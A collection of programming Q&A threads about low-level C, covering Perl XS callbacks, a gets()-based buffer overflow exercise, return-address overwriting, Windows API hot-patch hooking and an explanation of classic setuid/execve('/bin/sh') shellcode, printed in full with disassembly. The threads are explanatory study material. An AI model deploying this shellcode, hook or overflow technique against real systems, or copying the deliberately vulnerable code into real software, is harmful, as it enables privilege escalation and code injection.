I have a Perl library written in C and inside XS file I declared callback function to call Perl functions from C code. When call this function from C code (multithreaded):
char *
callbackfunc(void *fun, char **args)
{
dSP;
int count,i;
char *s;
ENTER;
SAVETMPS;
PUSHMARK(SP);
for(i=0;args[i];++i) {
XPUSHs(sv_2mortal(newSVpv(args[i],0)));
}
PUTBACK;
count = call_sv(fun,G_SCALAR|G_EVAL);
SPAGAIN;
s = NULL;
if(count > 1)
croak("callback may return only single value\n");
if(count==1) {
s = strdup(POPp);
}
PUTBACK;
FREETMPS;
LEAVE;
return s;
}
I get crash at dSP macro:
#0 callbackfunc (fun=0x2416a58, args=0x7f3a0cfa9a10) at MyLibrary.xs:24
24 dSP;
In disassembler it looks like some thread specific data not found:
push %r15
push %r14
mov %rdi,%r14
push %r13
mov %rsi,%r13
push %r12
push %rbp
push %rbx
sub $0x8,%rsp
mov 0x2015dd(%rip),%rbx
mov (%rbx),%edi
callq 0x7f3a0e37f550 <pthread_getspecific#plt>
mov (%rbx),%esi
mov (%rax),%r15 // here is crash because %rax is 0x0
You probably forgot to tell your thread about the current Perl interpreter. The perlembed man page says:
PERL_SET_CONTEXT(interp) should also be called whenever interp is used by a thread that did not create it (using either perl_alloc(), or the more esoteric perl_clone()).
Also note that calling Perl from C is not thread-safe. Make sure that proper locking is in place.
EDIT: If you didn't create the interpreter yourself, you can get a void * to the interpreter via the macro PERL_GET_CONTEXT. If you're only using a single interpreter, you could add some code to the XS boot section to store this value in a global. If you have multiple interpreters (or want to support fork on Windows), you have to track the current interpreter when registering your callback.
Related
I am trying to learn more about buffer overflows so I have created a simple program to gain knowledge and try to exploit it.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void failed(void)
{
puts("Did not exploit");
exit(0);
}
void pass(void)
{
puts("Good Job");
exit(1);
}
void foo()
{
char input[4];
gets(input);
}
int _main()
{
foo();
failed();
return 0;
}
I am trying to fill the buffer within foo() with random characters as well as the address of pass() such that the return address of foo() gets overwritten to the starting address of pass(). Using the GDB commands as follows to get relevant information.
x foo
-> 0x8049dd7 foo : 0xfb1e0ff3
disas foo
Dump of assembler code for function foo:
0x08049e09 <+0>: endbr32
0x08049e0d <+4>: push %ebp
0x08049e0e <+5>: mov %esp,%ebp
0x08049e10 <+7>: push %ebx
0x08049e11 <+8>: sub $0x14,%esp
0x08049e14 <+11>: call 0x8049e5a <__x86.get_pc_thunk.ax>
0x08049e19 <+16>: add $0x9b1e7,%eax
0x08049e1e <+21>: sub $0xc,%esp
0x08049e21 <+24>: lea -0xc(%ebp),%edx
0x08049e24 <+27>: push %edx
0x08049e25 <+28>: mov %eax,%ebx
0x08049e27 <+30>: call 0x8058850 <gets>
0x08049e2c <+35>: add $0x10,%esp
0x08049e2f <+38>: nop
0x08049e30 <+39>: mov -0x4(%ebp),%ebx
0x08049e33 <+42>: leave
0x08049e34 <+43>: ret
End of assembler dump.
I then created a python program which feeds its output into my vulnerable.c program as printing simply
print('A'*15 + '\x08\x04\x9d\xd7')
The A*15 is supposed to fill the buffer and the EBP then overwrites the return address with the address of foo (\x08\x04\x9d\xd7) but I continue to get segmentation faults. Any assistance would be great!
Any mistake and the attempt will segfault. You must:
have the right target address
put it in the right place on the stack
use the right byte order
The first one is difficult because the kernel will randomize address spaces on load,
primarily because of these kinds of attacks.
The other two you've gotten wrong.
If you'd like to play with something similar, here's an example
that changes the return address. Because of C calling conventions,
the stack is corrupted at the end of main, which can be fixed by using
stdcall or pascal calling conventions for the test function.
Syntax for that is compiler dependent.
#include <stdio.h>
#include <stdlib.h>
void oops() {
printf("oops!\n");
}
void /*__stdcall*/ test(int t)
{
/* x86 stack is top down, int is same size as pointer */
int *return_is_at = &t - 1;
/* replace parameter with our return address, for oops to return to */
*(&t) = *return_is_at; /* just-in-case avoid optimization*/
/* replace our return address with address of oops */
*return_is_at = (int)oops;
}
int main(int argc, char **argv)
{
test(1);
printf("test returned\n");
/* unless stdcall, at this point our stack is corrupted
and this return will crash, so:
*/
exit(1);
}
Here's an alternative function that uses a local variable to calculate
the return address location intead of the parameter.
This assumes a standard stack frame, which the compiler may optimize away.
It also corrupts the stack.
void test2()
{
/* x86 stack is top down, int is same size as pointer */
/* this relies on consistently defined stack frames */
int l;
int *return_is_at = &l + 2;
/* copy our return address up one,
for oops to return to (corrupting the stack)
*/
return_is_at[1] = *return_is_at;
/* replace our return address with address of oops */
*return_is_at = (int)oops;
}
FYI - It's possible to use a similar technique to track unique call trees for a function
(by walking up the stack frames) in order to fail specific call instances during testing.
So I was working on a project and was a little bored and thought about how to break C really hard:
Is it be possible, to trick the compiler in using jumps (goto) for a function call? - Maybe, I answered to myself. So after a bit of working and doing I realised, that some pointer stuff wasn't working correctly, but in an (at least for me) unexpected way: the goto wouldn't work as intended. After a little bit of experimenting, I came up with this stuff (comments removed, since I sometimes keep unused code in them, when testing):
//author: me, The Array :)
#include <stdio.h>
void * func_return();
void (*break_ptr)(void) = (void *)func_return;
void * func_return(){
printf("ok2\n");
break_ptr = &&test2;
return NULL;
if(0 == 1){
test2:
printf("sh*t\n");
}
}
void scoping(){
printf("beginning of scoping\n");
break_ptr();
printf("after func call #1\n");
break_ptr();
printf("!!!YOU WILL NOT SEE THIS!!!!\n");
}
int main(){
printf("beginning of programm\n");
scoping();
printf("ending programm\n");
}
I used gcc to compile this as I don't know any other compiler, that supports the use of that &&!
My platform is windows 64 bit and I used that most basic way to compile this:
gcc.exe "however_you_want_to_call_it.c" -o "however_you_want_to_call_it.exe"
When looking over that code I expected and wanted it to print "sh*t\n" to the console window (of course the \n will be invisible). But it turns out gcc is somewhat too smart for me? I guess this comes, when trying to break something..
Infact, as the title says, it returns twice:
beginning of programm
beginning of scoping
ok2
after func call #1
ok2
ending programm
It does not return twice, like the fork function and propably prints the following stuff twice or sth., no it returns out of the function AND the function that called it. So after the second call it does not print "!!!YOU WILL NOT SEE THIS!!!!\n" to the console, but rather "ending programm", as it returned twice. (I am trying to amplify the fact, that the "ending programm" is printed, as the programm does not crash)
So the reason, why I posted that here, is the following: my questions..
Why does it not go to/ jump to/ call to the actual test2 label and instead goes to the beginning of that function?
How would I achieve the thing of my first question?
Why does it return twice? I figured it is propably a compiler thing instead of a runtime thing, but I guess I'll wait for someones answer
Can the same thing (the returning twice) be achieved the first time the function "break_ptr" is called, instead of the second time?
I do not know and do not care if this also works in c++.
Now I can see many ways this can be usefull, some malicious and some actually good. For example could you code an enterprise function, which returns your function. Enterprise solutions to problems tend to be weird, so why not make a function which returns your code, idk..
Yet it can be malicious, for example, when some code is returning unexpectatly or even without return values.. I can imagine this existing in a dll file and a header file which simply reads "extern void *break_ptr();" or sth.. did not test it. (Yet there are way crueler ways to mess with someone..)
I could not find this documented anywhere on the internet. Please send me some links or references about this, if you find some, I want to learn more about it.
If this is "just" a bug and someone of the gnu/gcc guys is reading this: Please do NOT remove it, as it is too much fun working with these things.
Thank you in advance for your answers and your time and I am sorry for making this so long. I wanted to make sure everything collected about this is in one place. (Yet still I am sorry if I missed something..)
From gcc documentation on labels of values:
You may not use this mechanism to jump to code in a different function. If you do that, totally unpredictable things happen.
The behavior you are seeing is properly documented. Inspect the generated assembly to really know what code does the compiler generate.
The assembly from godbolt on gcc10.2 with no optimizations:
break_ptr:
.quad func_return
.LC0:
.string "ok2"
func_return:
push rbp
mov rbp, rsp
.L2:
mov edi, OFFSET FLAT:.LC0
call puts
mov eax, OFFSET FLAT:.L2
mov QWORD PTR break_ptr[rip], rax
mov eax, 0
pop rbp
ret
.LC1:
.string "beginning of scoping"
.LC2:
.string "after func call #1"
.LC3:
.string "!!!YOU WILL NOT SEE THIS!!!!"
scoping:
push rbp
mov rbp, rsp
mov edi, OFFSET FLAT:.LC1
call puts
mov rax, QWORD PTR break_ptr[rip]
call rax
mov edi, OFFSET FLAT:.LC2
call puts
mov rax, QWORD PTR break_ptr[rip]
call rax
mov edi, OFFSET FLAT:.LC3
call puts
nop
pop rbp
ret
.LC4:
.string "beginning of programm"
.LC5:
.string "ending programm"
main:
push rbp
mov rbp, rsp
mov edi, OFFSET FLAT:.LC4
call puts
mov eax, 0
call scoping
mov edi, OFFSET FLAT:.LC5
call puts
mov eax, 0
pop rbp
ret
shows that .L2 label was placed on top of function and the if (0 == 1) { /* this */ } was optimized out by the compiler. When you jump on .L2 you jump to beginning of the function, except that stack is incorrectly setup, because push rbp is omitted.
Why does it not go to/ jump to/ call to the actual test2 label and instead goes to the beginning of that function?
Because the documentation says that if you jump to another function "totally unpredictable things happen"
How would I achieve the thing of my first question?
Hard to say, since "jumping into a function" is not really something you should do.
Why does it return twice? I figured it is propably a compiler thing instead of a runtime thing, but I guess I'll wait for someones answer
Because returning twice is an element of the set of "unpredictable things"
Can the same thing (the returning twice) be achieved the first time the function "break_ptr" is called, instead of the second time?
See above. What you're doing will cause unpredictable things.
And just to point it out, your code has other flaws that may or may not be a part of this. func_return is a function taking an unspecified number of arguments returning a void pointer. break_ptr is a function taking NO arguments and returning void. The proper pointer would be
void * func_return();
void *(*break_ptr)() = func_return;
Notice three things. Apart from removing the cast, I removed void from the parenthesis and added an asterisk. But a better alternative would be
void * func_return(void);
void *(*break_ptr)(void) = func_return;
The main thing here is, do NOT cast to silence the compiler. Fix the problem instead. Read more about casting here
Your cast invokes undefined behavior, which essentially is the same thing as "unpredictable things happen".
Also, you're missing a return statement in that function.
void * func_return(){
printf("ok2\n");
break_ptr = &&test2;
return NULL;
if(0 == 1){
test2:
printf("sh*t\n");
}
// What happens here?
}
Omitting the return statement can only safely be done in a function returning void but this function returns void*. Omitting it will cause undefined behavior which, again, means that unpredictable things happen.
My programming language compiles to C, I want to implement tail recursion optimization. The question here is how to pass control to another function without "returning" from the current function.
It is quite easy if the control is passed to the same function:
void f() {
__begin:
do something here...
goto __begin; // "call" itself
}
As you can see there is no return value and no parameters, those are passed in a separate stack adressed by a global variable.
Another option is to use inline assembly:
#ifdef __clang__
#define tail_call(func_name) asm("jmp " func_name " + 8");
#else
#define tail_call(func_name) asm("jmp " func_name " + 4");
#endif
void f() {
__begin:
do something here...
tail_call(f); // "call" itself
}
This is similar to goto but as goto passes control to the first statement in a function, skipping the "entry code" generated by a compiler, jmp is different, it's argument is a function pointer, and you need to add 4 or 8 bytes to skip the entry code.
The both above will work but only if the callee and the caller use the same amount of stack for local variables which is allocated by the entry code of the callee.
I was thinking to do leave manually with inline assembly, then replace the return address on the stack, then do a legal function call like f(). But my attempts all crashed. You need to modify BP and SP somehow.
So again, how to implement this for x64? (Again, assuming functions have no arguments and return void). Portable way without inline assembly is better, but assembly is accepted. Maybe longjump can be used?
Maybe you can even push the callee address on the stack, replacing the original return address and just ret?
Do not try to do this yourself. A good C compiler can perform tail-call elimination in many cases and will do so. In contrast, a hack using inline assembly has a good chance of going wrong in a way that is difficult to debug.
For example, see this snippet on godbolt.org. To duplicate it here:
The C code I used was:
int foo(int n, int o)
{
if (n == 0) return o;
puts("***\n");
return foo(n - 1, o + 1);
}
This compiles to:
.LC0:
.string "***\n"
foo:
test edi, edi
je .L4
push r12
mov r12d, edi
push rbp
mov ebp, esi
push rbx
mov ebx, edi
.L3:
mov edi, OFFSET FLAT:.LC0
call puts
sub ebx, 1
jne .L3
lea eax, [r12+rbp]
pop rbx
pop rbp
pop r12
ret
.L4:
mov eax, esi
ret
Notice that the tail call has been eliminated. The only call is to puts.
Since you don't need arguments and return values, how about combining all function into one and use labels instead of function names?
f:
__begin:
...
CALL(h); // a macro implementing traditional call
...
if (condition_ret)
RETURN; // a macro implementing traditional return
...
goto g; // tail recurse to g
The tricky part here is RETURN and CALL macros. To return you should keep yet another stack, a stack of setjump buffers, so when you return you call longjump(ret_stack.pop()), and when you call you do ret_stack.push(setjump(f)). This is poetical rendition ofc, you'll need to fill out the details.
gcc can offer some optimization here with computed goto, they are more lightweight than longjump. Also people who write vms have similar problems, and seemingly have asm-based solutions for those even on MSVC, see example here.
And finally such approach even if it saves memory, may be confusing to compiler, so can cause performance anomalies. You probably better off generating for some portable assembler-like language, llvm maybe? Not sure, should be something that has computed goto.
The venerable approach to this problem is to use trampolines. Essentially, every compiled function returns a function pointer (and maybe an arg count). The top level is a tight loop that, starting with your main, simply calls the returned function pointer ad infinitum. You could use a function that longjmps to escape the loop, i.e., to terminate the progam.
See this SO Q&A. Or Google "recursion tco trampoline."
For another approach, see Cheney on the MTA, where the stack just grows until it's full, which triggers a GC. This works once the program is converted to continuation passing style (CPS) since in that style, functions never return; so, after the GC, the stack is all garbage, and can be reused.
I will suggest a hack. The x86 call instruction, which is used by the compiler to translate your function calls, pushes the return address on the stack and then performs a jump.
What you can do is a bit of a stack manipulation, using some inline assembly and possibly some macros to save yourself a bit of headache. You basically have to overwrite the return address on the stack, which you can do immediately in the function called. You can have a wrapper function which overwrites the return address and calls your function - the control flow will then return to the wrapper which then moves to wherever you pointed it to.
I'm trying to hook the Windows API function FindWindowA(). I successfully did it with the code below without "hotpatching" it: I've overwritten the bytes at the beginning of the function. myHook() is called and a message box shows up when FindWindowA() is called.
user32.dll has hotpatching enabled and I'd like to overwrite the NOPs before the actual function instead of overwriting the function itself. However, the code below won't work when I set hotpatching to TRUE. It does nothing when FindWindowA() gets executed.
#include <stdio.h>
#include <windows.h>
void myHook()
{
MessageBoxA(NULL, "Hooked", "Hook", MB_ICONINFORMATION);
}
int main(int argc, char *argv[])
{
BOOLEAN hotpatching = FALSE;
LPVOID fwAddress = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowA");
LPVOID fwHotpatchingAddress = (LPVOID)((DWORD)fwAddress - 5);
LPVOID myHookAddress = &myHook;
DWORD jmpOffset = (DWORD)&myHook - (DWORD)(!hotpatching ? fwAddress : fwHotpatchingAddress) - 5; // -5 because "JMP offset" = 5 bytes (1 + 4)
printf("fwAddress: %X\n", fwAddress);
printf("fwHotpatchingAddress: %X\n", fwHotpatchingAddress);
printf("myHookAddress: %X\n", myHookAddress);
printf("jmpOffset: %X\n", jmpOffset);
printf("Ready?\n\n");
getchar();
char JMP[1] = {0xE9};
char RETN[1] = {0xC3};
LPVOID offset0 = NULL;
LPVOID offset1 = NULL;
LPVOID offset2 = NULL;
if (!hotpatching)
offset0 = fwAddress;
else
offset0 = fwHotpatchingAddress;
offset1 = (LPVOID)((DWORD)offset0 + 1);
offset2 = (LPVOID)((DWORD)offset1 + 4);
DWORD oldProtect = 0;
VirtualProtect(offset0, 6, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(fwAddress, JMP, 1);
memcpy(offset1, &jmpOffset, 4);
memcpy(offset2, RETN, 1);
VirtualProtect(offset0, 6, oldProtect, &oldProtect);
printf("FindWindowA() Patched");
getchar();
FindWindowA(NULL, "Test");
getchar();
return 0;
}
Could you tell me what's wrong?
Thank you.
Hotpatching enabled executable images are prepared by the compiler and linker to allow replacing the image while in use. The following two changes are applied (x86):
The function entry point is set to a 2-byte no-op mov edi, edi (/hotpatch).
Five consecutive nop's are prepended to each function entry point (/FUNCTIONPADMIN).
To illustrate this, here is a typical disassembly listing of a hotpaching enabled function:
(2) 768C8D66 90 nop
768C8D67 90 nop
768C8D68 90 nop
768C8D69 90 nop
768C8D6A 90 nop
(1) 768C8D6B 8B FF mov edi,edi
(3) 768C8D6D 55 push ebp
768C8D6E 8B EC mov ebp,esp
(1) designates the function entry point with the 2-byte no-op. (2) is the padding provided by the linker, and (3) is where the non-trivial function implementation starts.
To hook into a function you have to overwrite (2) with a jump to your hook function jmp myHook, and make this code reachable by replacing (1) with a relative jump jmp $-5.
The hook function must leave the stack in a consistent state. It should be declared as __declspec(naked) to prevent the compiler from generating function prolog and epilog code. The final instruction must either perform stack cleanup in line with the calling convention of the hooked function, or jump back to the hooked function at the address designated by (3).
WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //setret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
can anyone give me a better explanation ?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.
2) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
Now I assume the following stack layout for your program:
+-------------------------+
| function arguments | |
| (e.g. argv, argc) | | (note: the stack
+-------------------------+ <-- ss:esp + 12 | grows downward!)
| return address | |
+-------------------------+ <-- ss:esp + 8 V
| saved ebp register |
+-------------------------+ <-- ss:esp + 4 / ss:ebp - 0 (see code below)
| local variable (ret) |
+-------------------------+ <-- ss:esp + 0 / ss:ebp - 4
At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
retf
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include it's origin next time.
From that same document, how to code stack based exploits :
/* the shellcode is hex for: */
#include <stdio.h>
main() {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :
In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This is just spawn /bin/sh, for example in C like execve("/bin/sh", NULL, NULL);